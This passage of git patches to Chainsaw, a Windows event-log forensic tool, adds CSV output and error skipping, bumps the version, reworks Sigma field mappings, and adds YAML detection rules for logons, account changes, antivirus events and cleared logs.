} + }; if metadata.is_dir() { - let directory = path.read_dir()?; + let directory = match path.read_dir() { + Ok(directory) => directory, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to read directory - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + } + }; for dir in directory { - files.extend(get_files(&dir?.path(), &extension)?); + let dir = match dir { + Ok(dir) => dir, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to enter directory - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + } + }; + files.extend(get_files(&dir.path(), &extension, skip_errors)?); } } else { if let Some(extension) = extension { diff --git a/src/main.rs b/src/main.rs index f09053b4..b5c9d59a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -46,6 +46,9 @@ enum Command { /// Set the column width for the tabular output. #[structopt(long = "column-width", conflicts_with = "json")] column_width: Option, + /// Print the output in csv format. + #[structopt(group = "format", long = "csv", requires("output"))] + csv: bool, /// Only hunt through files with the provided extension. #[structopt(long = "extension")] extension: Option, @@ -67,7 +70,7 @@ enum Command { /// Apply addional metadata for the tablar output. #[structopt(long = "metadata", conflicts_with = "json")] metadata: bool, - /// The file to output to. + /// The file/directory to output to. #[structopt(short = "o", long = "output")] output: Option, /// Supress informational output. @@ -162,27 +165,38 @@ fn print_title() { ); } -fn init_writer(output: Option, json: bool, quiet: bool) -> crate::Result<()> { - let output = match &output { +fn init_writer(output: Option, csv: bool, json: bool, quiet: bool) -> crate::Result<()> { + let (path, output) = match &output { Some(path) => { - let file = match File::create(path) { - Ok(f) => f, - Err(e) => { - return Err(anyhow::anyhow!( - "Unable to write to specified output file - {} - {}", - path.display(), - e - )); - } - }; - Some(file) + if csv { + (Some(path.to_path_buf()), None) + } else { + let file = match File::create(path) { + Ok(f) => f, + Err(e) => { + return Err(anyhow::anyhow!( + "Unable to write to specified output file - {} - {}", + path.display(), + e + )); + } + }; + (None, Some(file)) + } } - None => None, + None => (None, None), + }; + let format = if csv { + Format::Csv + } else if json { + Format::Json + } else { + Format::Std }; - let format = if json { Format::Json } else { Format::Std }; let writer = Writer { format, output, + path, quiet, }; set_writer(writer).expect("could not set writer"); @@ -201,6 +215,7 @@ fn run() -> Result<()> { load_unknown, column_width, + csv, extension, from, full, @@ -213,7 +228,7 @@ fn run() -> Result<()> { timezone, to, } => { - init_writer(output, json, quiet)?; + init_writer(output, csv, json, quiet)?; if !opts.no_banner { print_title(); } @@ -226,7 +241,7 @@ fn run() -> Result<()> { let mut count = 0; let mut rs = vec![]; for path in &rules { - for file in get_files(path, &None)? { + for file in get_files(path, &None, skip_errors)? { match load_rule(&RuleKind::Sigma, &file) { Ok(mut r) => { count += 1; @@ -266,7 +281,7 @@ fn run() -> Result<()> { let hunter = hunter.build()?; let mut files = vec![]; for path in &path { - files.extend(get_files(path, &extension)?); + files.extend(get_files(path, &extension, skip_errors)?); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); @@ -276,7 +291,9 @@ fn run() -> Result<()> { pb.inc(1); } pb.finish(); - if json { + if csv { + cli::print_csv(&detections, hunter.mappings(), local, timezone)?; + } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( @@ -297,14 +314,14 @@ fn run() -> Result<()> { ); } Command::Lint { path, kind } => { - init_writer(None, false, false)?; + init_writer(None, false, false, false)?; if !opts.no_banner { print_title(); } cs_eprintln!("[+] Validating supplied detection rules..."); let mut count = 0; let mut failed = 0; - for file in get_files(&path, &None)? { + for file in get_files(&path, &None, false)? { if let Err(e) = lint_rule(&kind, &file) { failed += 1; cs_eprintln!("[!] {}", e); @@ -338,7 +355,7 @@ fn run() -> Result<()> { timezone, to, } => { - init_writer(output, json, quiet)?; + init_writer(output, false, json, quiet)?; if !opts.no_banner { print_title(); } @@ -359,7 +376,7 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { - files.extend(get_files(path, &extension)?); + files.extend(get_files(path, &extension, skip_errors)?); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) diff --git a/src/write.rs b/src/write.rs index 9e107b96..16666cee 100644 --- a/src/write.rs +++ b/src/write.rs @@ -1,15 +1,18 @@ use std::fs::File; +use std::path::PathBuf; use anyhow::Result; pub static mut WRITER: Writer = Writer { format: Format::Std, output: None, + path: None, quiet: false, }; pub enum Format { Std, + Csv, Json, } @@ -22,6 +25,7 @@ impl Default for Format { pub struct Writer { pub format: Format, pub output: Option, + pub path: Option, pub quiet: bool, } @@ -30,6 +34,7 @@ impl Default for Writer { Self { format: Format::Std, output: None, + path: None, quiet: false, } } From fe04fe4c06e0d833a5de74f3d5a5069f6ad5ea56 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:04:27 +0100 Subject: [PATCH 04/77] build: bump to v2.0.0-alpha.1 --- Cargo.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 5fdc826b..b56af3d9 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.0" +version = "2.0.0-alpha.1" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 49881094a841d5dc3984a0ac3f697e17cd3a2d04 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:15:48 +0100 Subject: [PATCH 05/77] build: add in the lock changes --- Cargo.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index 9908a99d..4de6f70a 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.0" +version = "2.0.0-alpha.1" dependencies = [ "aho-corasick 0.7.18", "anyhow", From c428820494979d5f5f89fc9b1e989f63d7ddb839 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 4 Jun 2022 19:52:54 +0100 Subject: [PATCH 06/77] feat: add initial support for chainsaw rules --- Cargo.lock | 32 +- Cargo.toml | 1 + mappings/sigma-event-logs.yml | 296 +++++++---- rules/account_tampering/new_user_created.yml | 27 + .../user_added_to_global_group.yml | 34 ++ .../user_added_to_local_group.yml | 34 ++ .../user_added_to_universal_group.yml | 34 ++ rules/antivirus/f-secure.yml | 41 ++ rules/antivirus/kaspersky.yml | 29 + rules/antivirus/sophos.yml | 29 + rules/antivirus/windows_defender.yml | 29 + rules/lateral_movement/batch_logon.yml | 39 ++ rules/lateral_movement/interactive_logon.yml | 39 ++ rules/lateral_movement/network_logon.yml | 39 ++ rules/lateral_movement/rdp_logon.yml | 39 ++ rules/lateral_movement/service_logon.yml | 39 ++ rules/lateral_movement/unlock_logon.yml | 38 ++ .../security_audit_log_was_cleared.yml | 30 ++ .../log_tampering/system_log_was_cleared.yml | 30 ++ rules/login_attacks/account_brute_force.yml | 34 ++ rules/service_tampering/event_log.yml | 29 + src/cli.rs | 459 ++++++++++------ src/ext/tau.rs | 34 +- src/file/evtx.rs | 34 -- src/file/mod.rs | 17 + src/hunt.rs | 503 ++++++++++++------ src/lib.rs | 2 +- src/main.rs | 22 +- src/rule/chainsaw.rs | 204 ++++++- src/rule/mod.rs | 111 +++- src/rule/sigma.rs | 15 + src/rule/stalker.rs | 33 +- src/search.rs | 3 + 33 files changed, 1855 insertions(+), 524 deletions(-) create mode 100644 rules/account_tampering/new_user_created.yml create mode 100644 rules/account_tampering/user_added_to_global_group.yml create mode 100644 rules/account_tampering/user_added_to_local_group.yml create mode 100644 rules/account_tampering/user_added_to_universal_group.yml create mode 100644 rules/antivirus/f-secure.yml create mode 100644 rules/antivirus/kaspersky.yml create mode 100644 rules/antivirus/sophos.yml create mode 100644 rules/antivirus/windows_defender.yml create mode 100644 rules/lateral_movement/batch_logon.yml create mode 100644 rules/lateral_movement/interactive_logon.yml create mode 100644 rules/lateral_movement/network_logon.yml create mode 100644 rules/lateral_movement/rdp_logon.yml create mode 100644 rules/lateral_movement/service_logon.yml create mode 100644 rules/lateral_movement/unlock_logon.yml create mode 100644 rules/log_tampering/security_audit_log_was_cleared.yml create mode 100644 rules/log_tampering/system_log_was_cleared.yml create mode 100644 rules/login_attacks/account_brute_force.yml create mode 100644 rules/service_tampering/event_log.yml diff --git a/Cargo.lock b/Cargo.lock index 4de6f70a..c39bbc6d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -174,6 +174,7 @@ dependencies = [ "serde_yaml", "structopt", "tau-engine", + "uuid", ] [[package]] @@ -527,6 +528,17 @@ dependencies = [ "wasi 0.9.0+wasi-snapshot-preview1", ] +[[package]] +name = "getrandom" +version = "0.2.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" +dependencies = [ + "cfg-if", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", +] + [[package]] name = "glob" version = "0.3.0" @@ -923,7 +935,7 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "de0737333e7a9502c789a36d7c7fa6092a49895d4faa31ca5df163857ded2e9d" dependencies = [ - "getrandom", + "getrandom 0.1.16", "redox_syscall 0.1.57", "rust-argon2", ] @@ -1151,9 +1163,9 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.95" +version = "1.0.96" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fbaf6116ab8924f39d52792136fb74fd60a80194cf1b1c6ffa6453eef1c3f942" +checksum = "0748dd251e24453cb8717f0354206b91557e4ec8703673a4b30208f2abaf1ebf" dependencies = [ "proc-macro2", "quote", @@ -1162,9 +1174,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.4.0" +version = "1.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e01789704e01baf9d6b0e677648e6bf52b7ba7192c9201dd426f02ab6d493f9f" +checksum = "f32fcbd3e364cb39fac2f5753f3b21df0dcf246eacec2953453400fad64c9db8" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1339,6 +1351,16 @@ version = "1.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" +[[package]] +name = "uuid" +version = "1.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6d5d669b51467dcf7b2f1a796ce0f955f05f01cafda6c19d6e95f730df29238" +dependencies = [ + "getrandom 0.2.6", + "serde", +] + [[package]] name = "vec_map" version = "0.8.2" diff --git a/Cargo.toml b/Cargo.toml index b56af3d9..e8d33b64 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -25,6 +25,7 @@ serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" tau-engine = { version = "1.0", features = ["core", "json"] } +uuid = { version = "1.1", features = ["serde", "v4"] } [dev-dependencies] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index a33db3b4..8d6d1c3d 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -14,153 +14,231 @@ groups: - name: Suspicious Process Creation timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 1 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 1 + Provider: Microsoft-Windows-Sysmon fields: - CommandLine: Event.EventData.CommandLine - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - OriginalFileName: Event.EventData.OriginalFileName - ParentCommandLine: Event.EventData.ParentCommandLine - ParentImage: Event.EventData.ParentImage - default: - - EventID - - Computer - - Image - - CommandLine + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Command Line + from: CommandLine + to: Event.EventData.CommandLine + - name: Original File Name + from: OriginalFileName + to: Event.EventData.OriginalFileName + - name: Parent Image + from: ParentImage + to: Event.EventData.ParentImage + - name: Parent Command Line + from: ParentCommandLine + to: Event.EventData.ParentCommandLine - name: Suspicious Network Connection timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 3 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 3 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - DestinationIp: Event.EventData.DestinationIp - DestinationHostname: Event.EventData.DestinationHostname - DestinationPort: Event.EventData.DestinationPort - DestinationIsIpv6: Event.EventData.DestinationIsIpv6 - EventID: Event.System.EventID - Image: Event.EventData.Image - Initiated: Event.EventData.Initiated - SourcePort: Event.EventData.SourcePort - User: Event.EventData.User - default: - - EventID - - Computer - - Image - - DestinationIp - - DestinationPort + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: User + to: Event.EventData.User + - name: Image + from: Image + to: Event.EventData.Image + - name: Destination IP + from: DestinationIp + to: Event.EventData.DestinationIp + - name: Destination Port + from: DestinationPort + to: Event.EventData.DestinationPort + - name: Destination Hostname + from: DestinationHostname + to: Event.EventData.DestinationHostname + - name: Destination Is IPv6 + from: DestinationIsIpv6 + to: Event.EventData.DestinationIsIpv6 + visible: false + - name: Initiated + from: Initiated + to: Event.EventData.Initiated + - name: Source Port + from: SourcePort + to: Event.EventData.SourcePort - name: Suspicious Image Load timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 7 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 7 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - ImageLoaded: Event.EventData.ImageLoaded - default: - - EventID - - Computer - - Image - - ImageLoaded + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Image Loaded + from: ImageLoaded + to: Event.EventData.ImageLoaded - name: Suspicious File Creation timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 11 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 11 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - TargetFilename: Event.EventData.TargetFilename - default: - - EventID - - Computer - - TargetFilename - - Image + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Target File Name + from: TargetFilename + to: Event.EventData.TargetFilename - name: Suspicious Registry Event timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 13 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 13 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - Details: Event.EventData.Details - EventID: Event.System.EventID - Image: Event.EventData.Image - TargetObject: Event.EventData.TargetObject - default: - - EventID - - Computer - - Details - - TargetObject + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Details + from: Details + to: Event.EventData.Details + - name: Target Object + from: TargetObject + to: Event.EventData.TargetObject - name: Suspicious Service Installed timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 7045 - Event.System.Provider: Service Control Manager + EventID: 7045 + Provider: Service Control Manager fields: - CommandLine: Event.EventData.ImagePath - Computer: Event.System.Computer - EventID: Event.System.EventID - ServiceName: Event.EventData.ServiceName - default: - - EventID - - Computer - - CommandLine - - ServiceName + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Service + from: ServiceName + to: Event.EventData.ServiceName + # TODO: Can someone check if this is a typo...? + - name: Command Line + from: CommandLine + to: Event.EventData.ImagePath - name: Suspicious Command Line timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4688 - Event.System.Provider: Microsoft-Windows-Security-Auditing + EventID: 4688 + Provider: Microsoft-Windows-Security-Auditing fields: - CommandLine: Event.EventData.CommandLine - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.NewProcessName - UserName: Event.EventData.SubjectUserName - default: - - EventID - - Computer - - CommandLine - - Image + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: UserName + to: Event.EventData.SubjectUserName + # TODO: Can someone check if this is a typo...? + - name: Process + from: Image + to: Event.EventData.NewProcessName + - name: Command Line + from: CommandLine + to: Event.EventData.CommandLine - name: Suspicious Powershell ScriptBlock timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4104 - Event.System.Provider: Microsoft-Windows-PowerShell + EventID: 4104 + Provider: Microsoft-Windows-PowerShell fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - ScriptBlockText: Event.EventData.ScriptBlockText - default: - - EventID - - Computer - - ScriptBlockText + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Script Block + from: ScriptBlockText + to: Event.EventData.ScriptBlockText - name: Suspicious Scheduled Task Created timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4698 - Event.System.Provider: Microsoft-Windows-Security-Auditing + EventID: 4698 + Provider: Microsoft-Windows-Security-Auditing fields: - CommandLine: Event.EventData.TaskContent - Computer: Event.System.Computer - EventID: Event.System.EventID - UserName: Event.EventData.SubjectUserName - default: - - EventID - - Computer - - CommandLine - - UserName + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: UserName + to: Event.EventData.SubjectUserName + # TODO: Can someone check if this is a typo...? + - name: Command Line + from: CommandLine + to: Event.EventData.TaskContent diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml new file mode 100644 index 00000000..b819c13d --- /dev/null +++ b/rules/account_tampering/new_user_created.yml @@ -0,0 +1,27 @@ +--- +title: New User Created +group: Account Tampering +description: A new user was created. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: User SID + to: Event.EventData.TargetSid + + +filter: + Event.System.EventID: 4720 diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml new file mode 100644 index 00000000..ab3c63cd --- /dev/null +++ b/rules/account_tampering/user_added_to_global_group.yml @@ -0,0 +1,34 @@ +--- +title: User Added to Global Group +group: Account Tampering +description: A user was added to an global group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4728 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml new file mode 100644 index 00000000..e781bba3 --- /dev/null +++ b/rules/account_tampering/user_added_to_local_group.yml @@ -0,0 +1,34 @@ +--- +title: User Added to Local Group +group: Account Tampering +description: A user was added to a local group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4732 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml new file mode 100644 index 00000000..0d210df6 --- /dev/null +++ b/rules/account_tampering/user_added_to_universal_group.yml @@ -0,0 +1,34 @@ +--- +title: User Added to Universal Group +group: Account Tampering +description: A user was added to a universal group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4756 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml new file mode 100644 index 00000000..4eee3ec2 --- /dev/null +++ b/rules/antivirus/f-secure.yml @@ -0,0 +1,41 @@ +--- +title: F-Secure Antivirus +group: Antivirus +description: Events from F-Secure's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Name + from: threat_name + container: + field: Event.EventData.rv + format: json + to: iname + - name: Threat Path + from: threat_path + container: + field: Event.EventData.rv + format: json + to: obj.ref + - name: SHA1 + from: sha1 + container: + field: Event.EventData.rv + format: json + to: obj.sha1 + + +filter: + Event.System.Provider: F-Secure Ultralight SDK diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml new file mode 100644 index 00000000..4a56c7ce --- /dev/null +++ b/rules/antivirus/kaspersky.yml @@ -0,0 +1,29 @@ +--- +title: Kaspersky Antivirus +group: Antivirus +description: Events from Kaspersky's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Name + to: Event.EventData.Data[1] + - name: Threat Path + to: Event.EventData.Data[0] + + +filter: + Event.System.Provider: + - Real-time file protection + - OnDemandScan diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml new file mode 100644 index 00000000..58fb3742 --- /dev/null +++ b/rules/antivirus/sophos.yml @@ -0,0 +1,29 @@ +--- +title: Sophos Antivirus +group: Antivirus +description: Events from Sophos' Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Type + to: Event.EventData.Data[0] + - name: Threat Name + to: Event.EventData.Data[2] + - name: Threat Path + to: Event.EventData.Data[1] + + +filter: + Event.System.Provider: Sophos Anti-Virus diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml new file mode 100644 index 00000000..5125b1b4 --- /dev/null +++ b/rules/antivirus/windows_defender.yml @@ -0,0 +1,29 @@ +--- +title: Windows Defender +group: Antivirus +description: Events from Windows Defender. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.Detection User + - name: Threat Name + to: Event.EventData.Threat Name + - name: Threat Path + to: Event.EventData.Path + + +filter: + Event.System.Provider: Microsoft-Windows-Windows Defender diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml new file mode 100644 index 00000000..fe0175eb --- /dev/null +++ b/rules/lateral_movement/batch_logon.yml @@ -0,0 +1,39 @@ +--- +title: Batch Logon +group: Lateral Movement +description: An Batch based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: batch and not local_ips_or_machine_accounts + + batch: + Event.System.EventID: 4624 + Event.EventData.LogonType: 4 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml new file mode 100644 index 00000000..b83dfab0 --- /dev/null +++ b/rules/lateral_movement/interactive_logon.yml @@ -0,0 +1,39 @@ +--- +title: Interactive Logon +group: Lateral Movement +description: An Interactive based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: interactive and not local_ips_or_machine_accounts + + interactive: + Event.System.EventID: 4624 + Event.EventData.LogonType: 2 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml new file mode 100644 index 00000000..51fbe425 --- /dev/null +++ b/rules/lateral_movement/network_logon.yml @@ -0,0 +1,39 @@ +--- +title: Network Logon +group: Lateral Movement +description: An Network based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: network and not local_ips_or_machine_accounts + + network: + Event.System.EventID: 4624 + Event.EventData.LogonType: 3 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml new file mode 100644 index 00000000..ecdcfa6c --- /dev/null +++ b/rules/lateral_movement/rdp_logon.yml @@ -0,0 +1,39 @@ +--- +title: RDP Logon +group: Lateral Movement +description: An RDP based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: rdp and not local_ips_or_machine_accounts + + rdp: + Event.System.EventID: 4624 + Event.EventData.LogonType: 10 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml new file mode 100644 index 00000000..3823b34c --- /dev/null +++ b/rules/lateral_movement/service_logon.yml @@ -0,0 +1,39 @@ +--- +title: Service Logon +group: Lateral Movement +description: An Service based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: service and not local_ips_or_machine_accounts + + service: + Event.System.EventID: 4624 + Event.EventData.LogonType: 5 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml new file mode 100644 index 00000000..50b74080 --- /dev/null +++ b/rules/lateral_movement/unlock_logon.yml @@ -0,0 +1,38 @@ +--- +title: Unlock Logon +group: Lateral Movement +description: An Unlock based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: unlock and not local_ips_or_machine_accounts + + unlock: + Event.System.EventID: 4624 + Event.EventData.LogonType: 7 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml new file mode 100644 index 00000000..9581ff8e --- /dev/null +++ b/rules/log_tampering/security_audit_log_was_cleared.yml @@ -0,0 +1,30 @@ +--- +title: Security Audit Logs Cleared +group: Log Tampering +description: The security audit logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: security_log_cleared and not empty + + security_log_cleared: + Event.System.EventID: 1102 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml new file mode 100644 index 00000000..6d52a275 --- /dev/null +++ b/rules/log_tampering/system_log_was_cleared.yml @@ -0,0 +1,30 @@ 